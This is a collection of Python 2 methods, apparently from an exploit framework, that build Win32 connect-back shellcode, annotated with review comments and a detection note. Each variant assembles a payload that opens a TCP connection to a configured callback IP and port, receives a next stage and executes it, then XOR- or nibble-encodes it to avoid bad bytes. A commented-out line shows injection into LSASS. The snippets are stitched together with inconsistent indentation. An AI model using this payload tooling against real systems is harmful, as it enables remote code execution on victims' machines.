 def createShellcode(self):
     """Build the Win32 connect-back payload for this module and XOR-encode it.

     Generator attributes are added in the order listed (the order is part of
     the resulting byte sequence, so do not reorder them).  The raw bytes are
     then passed through ``simpleXOR`` with ``self.badstring`` as the set of
     byte values that must not appear in the output.  The encoded payload is
     stored on ``self.shellcode`` and returned.

     Raises Exception when ``find_key`` reports no usable key (return value 0)
     or when the encoder returns an empty string.

     Detection note: the observable artefacts are a TCP connect-back to
     ``self.callback.ip``/``self.callback.port`` and a payload wrapped in a
     XOR decoder stub (presumably single-byte keyed, cf. ``key=0x3a`` on
     another variant on this page -- confirm against the encoder module).
     """
     # Deferred import: the generator is only needed while building the payload.
     import shellcode.shellcodeGenerator as shellcodeGenerator
     sc = shellcodeGenerator.win32()
     # The value 3000 is hard-coded here; other variants on this page read it
     # from self.subesp.  Presumably a stack-pointer adjustment -- TODO confirm.
     sc.addAttr('findeipnoesp', {'subespval': 3000})
     sc.addAttr('revert_to_self_before_importing_ws2_32', None)
     # Connect back to the configured callback address.
     sc.addAttr('tcpconnect', {
         'port': self.callback.port,
         'ipaddress': self.callback.ip
     })
     # 'socketreg' names where the generator keeps the socket; FDSPOT is a
     # generator-defined name.  Judging by the attribute name this stage
     # receives and executes the next stage over that socket -- verify in the
     # generator module.
     sc.addAttr('CreateThreadRecvExecWin32',
                {'socketreg': 'FDSPOT'})  #MOSDEF
     sc.addAttr('ExitThread', None)
     rawshellcode = sc.get()
     import encoder.xorencoder as xorencoder
     encoder = xorencoder.simpleXOR()
     encoder.setbadstring(self.badstring)
     # find_key() returning 0 is treated as "no key avoids every bad byte".
     ret = encoder.find_key(rawshellcode)
     if ret == 0:
         self.log('Could not find a key for this shellcode!')
         # NOTE(review): Python 2-only raise form; raise Exception('...')
         # is accepted by both Python 2 and 3.
         raise Exception, 'No shellcode generated'
     self.shellcode = encoder.encode(rawshellcode)
     # Second guard: the encoder may hand back an empty string.
     if self.shellcode == '':
         raise Exception, 'No shellcode generated'
     # Key is logged in hex; the length message uses %s unlike the %d used
     # by the sibling variants.
     self.log('Xor key used: %x' % (encoder.getkey()))
     self.log('Length of shellcode=%s' % (len(self.shellcode)))
     return self.shellcode
    def createShellcode(self):
        """Build the Win32 connect-back payload, nibble-encode it, then XOR-encode it.

        Two encoding passes are applied: first ``intel_nibbleencoder`` with the
        uppercase letters A-Z as forbidden bytes, then ``simpleXOR`` with the
        module's real ``self.badstring``.  Intermediate and final lengths are
        printed.  The result is stored on ``self.shellcode`` and returned, or
        ``None`` is returned when the encoded payload is empty.

        NOTE(review): the return value of ``find_key`` is discarded, so a
        failed key search (signalled by 0 in the other variants on this page)
        is not detected here; the empty-length check at the end is the only
        guard.
        """
        sc=shellcodeGenerator.win32()
        # self.subesp is the stack adjustment value; presumably a "sub esp"
        # amount -- TODO confirm in the generator module.
        sc.addAttr("findeipnoesp",{"subespval": self.subesp}) #don't mess with eip
        sc.addAttr("revert_to_self_before_importing_ws2_32", None)
        # Connect back to the configured callback address.
        sc.addAttr("tcpconnect",{"port":self.callback.port,"ipaddress":self.callback.ip})
        # FDSPOT is the generator-defined name for where the socket lives.
        sc.addAttr("CreateThreadRecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
        sc.addAttr("ExitThread",None)

        rawshellcode=sc.get()

        # Python 2 print statement (used file-wide).
        print "[!] RAW Shellcode len: %d bytes" % len(rawshellcode)

        # First pass: nibble encoding.
        enc = nibble_encoder.intel_nibbleencoder()
        bad = ""
        for i in range(ord('A'),ord('Z')+1):
            # A-Z inclusive (uppercase: the range is ord('A')..ord('Z'), not
            # a-z as the original comment said) are treated as bad bytes for
            # this pass.
            bad+=chr(i)
        enc.setbadstring(bad)
        rawshellcode = enc.encode(rawshellcode)

        print "[!] Nibble Encoded Shellcode len: %d bytes" % len(rawshellcode)

        # Second pass: XOR encoding against the module's real bad-byte string.
        encoder = xorencoder.simpleXOR()
        encoder.setbadstring(self.badstring)
        # Return value (key or 0 on failure in the sibling variants) ignored here.
        encoder.find_key(rawshellcode)
        self.shellcode = encoder.encode(rawshellcode)

        print "[!] Shellcode len: %d bytes" % len(self.shellcode)

        # Empty result is reported as None rather than raised.
        if not len(self.shellcode):
            return None

        return self.shellcode
    def createShellcode(self):
        """Build the Win32 connect-back payload and XOR-encode it.

        Same attribute sequence as the nibble-encoding variant on this page
        but with a single ``simpleXOR`` pass against ``self.badstring`` and
        ``TerminateThread`` as the final stage instead of ``ExitThread``.
        The result is stored on ``self.shellcode`` and returned; ``None`` is
        returned when the encoded payload is empty.

        NOTE(review): the return value of ``find_key`` is discarded, so a
        failed key search (0 in the sibling variants) goes unnoticed; only
        the empty-length check at the end guards the result.
        """
        sc = shellcodeGenerator.win32()
        # self.subesp: presumably a "sub esp" adjustment -- TODO confirm.
        sc.addAttr("findeipnoesp",
                   {"subespval": self.subesp})  #don't mess with eip
        sc.addAttr("revert_to_self_before_importing_ws2_32", None)
        # Connect back to the configured callback address.
        sc.addAttr("tcpconnect", {
            "port": self.callback.port,
            "ipaddress": self.callback.ip
        })
        # FDSPOT is the generator-defined name for where the socket lives.
        sc.addAttr("CreateThreadRecvExecWin32",
                   {"socketreg": "FDSPOT"})  #MOSDEF
        # Differs from the other variants, which end with "ExitThread".
        sc.addAttr("TerminateThread", None)

        rawshellcode = sc.get()

        # Python 2 print statement (used file-wide).
        print "[!] RAW Shellcode len: %d bytes" % len(rawshellcode)

        # XOR encoding against the module's real bad-byte string.
        encoder = xorencoder.simpleXOR()
        encoder.setbadstring(self.badstring)
        # Return value (key, or 0 on failure in the sibling variants) ignored.
        encoder.find_key(rawshellcode)
        self.shellcode = encoder.encode(rawshellcode)

        print "[!] Shellcode len: %d bytes" % len(self.shellcode)

        # Empty result is reported as None rather than raised.
        if not len(self.shellcode):
            return None

        return self.shellcode
    def createShellcode(self):
        """XOR-encode the payload prepared by ``createWin32ClientSideShellcode``.

        Unlike the other variants on this page this uses a fixed key
        (``0x3a``) with no ``find_key`` search, and returns nothing: the
        encoded result is only stored on ``self.shellcode``.
        """
        # Defined elsewhere in the class; expected to populate self.shellcode,
        # which is read below -- verify it does not return the payload instead.
        self.createWin32ClientSideShellcode()

        # Fixed key.  setbadstring() is still called, but whether encode()
        # itself validates the output against self.badstring is not visible
        # here; nothing in this method checks it.
        encoder = simpleXOR(key=0x3a)
        encoder.setbadstring(self.badstring)
        # Commented-out variant left as in the original.
        #self.shellcode = "\xcc" + encoder.encode(self.shellcode) + "\xcc"
        self.shellcode = encoder.encode(self.shellcode)
 def encodeshellcode(self, rawshellcode):
     """XOR-encode *rawshellcode* so that no byte of ``self.badstring`` appears.

     Searches for a key with ``simpleXOR.find_key``; a return of 0 is treated
     as "no usable key".  The encoded payload is stored on ``self.shellcode``
     and returned.  The key (hex), the length and the first 16 bytes are
     logged/printed as a debugging aid.

     Raises Exception when no key is found or the encoder returns an empty
     string.
     """
     from encoder import xorencoder
     encoder = xorencoder.simpleXOR()
     encoder.setbadstring(self.badstring)
     # find_key() returning 0 is treated as failure.
     ret = encoder.find_key(rawshellcode)
     if ret == 0:
         self.log('Could not find a key for this shellcode!')
         # NOTE(review): Python 2-only raise form; raise Exception('...')
         # is accepted by both Python 2 and 3.
         raise Exception, 'No shellcode generated'
     self.shellcode = encoder.encode(rawshellcode)
     # Second guard: the encoder may hand back an empty string.
     if self.shellcode == '':
         raise Exception, 'No shellcode generated'
     self.log('Xor key used: %x' % (encoder.getkey()))
     self.log('Length of shellcode=%d' % (len(self.shellcode)))
     # Debug output of the leading bytes (Python 2 print statement).
     print repr(self.shellcode[:16])
     return self.shellcode
 def createShellcode(self):
     """Build a smaller Win32 connect-back payload and XOR-encode it.

     Differs from the other variants on this page: ``findeipnoesp`` is added
     without a ``subespval``, a ``Fix RtlEnterCriticalSection`` attribute is
     inserted before the connect, and ``SmallRecvExecWin32`` is used as the
     receive/execute stage.  The result is stored on ``self.shellcode`` and
     returned.

     Raises Exception when ``find_key`` reports no usable key (return value 0)
     or when the encoder returns an empty string.
     """
     # Commented-out alternatives left as in the original.
     #self.log('Creating shellcode to callback to %s:%s'%(self.callback.ip,self.callback.port))
     #self.shellcode=self.createHeapSafeInjectIntoProcess(self.badstring,self.callback.ip,self.callback.port,smallcode=1,processname='LSASS.EXE',backupprocess='lsass.exe')
     sc=shellcodeGenerator.win32()
     # No subespval here, unlike the sibling variants.
     sc.addAttr('findeipnoesp',None)
     # Generator-side fix-up; its semantics live in the generator module.
     sc.addAttr('Fix RtlEnterCriticalSection',{'SimpleFix':1})
     # Connect back to the configured callback address.
     sc.addAttr('tcpconnect',{'port':self.callback.port,'ipaddress':self.callback.ip})
     # FDSPOT is the generator-defined name for where the socket lives.
     sc.addAttr('SmallRecvExecWin32',{'socketreg':'FDSPOT'}) #MOSDEF
     rawshellcode=sc.get()
     encoder=xorencoder.simpleXOR()
     encoder.setbadstring(self.badstring)
     # find_key() returning 0 is treated as "no key avoids every bad byte".
     ret=encoder.find_key(rawshellcode)
     if ret==0:
         self.log('Could not find a key for this shellcode!')
         # NOTE(review): Python 2-only raise form; raise Exception('...')
         # is accepted by both Python 2 and 3.
         raise Exception,'No shellcode generated'
     self.shellcode=encoder.encode(rawshellcode)
     # Second guard: the encoder may hand back an empty string.
     if self.shellcode=='':
         raise Exception,'No shellcode generated'
     self.log('Xor key used: %x'%(encoder.getkey()))
     self.log('Length of shellcode: %d'%(len(self.shellcode)))
     return self.shellcode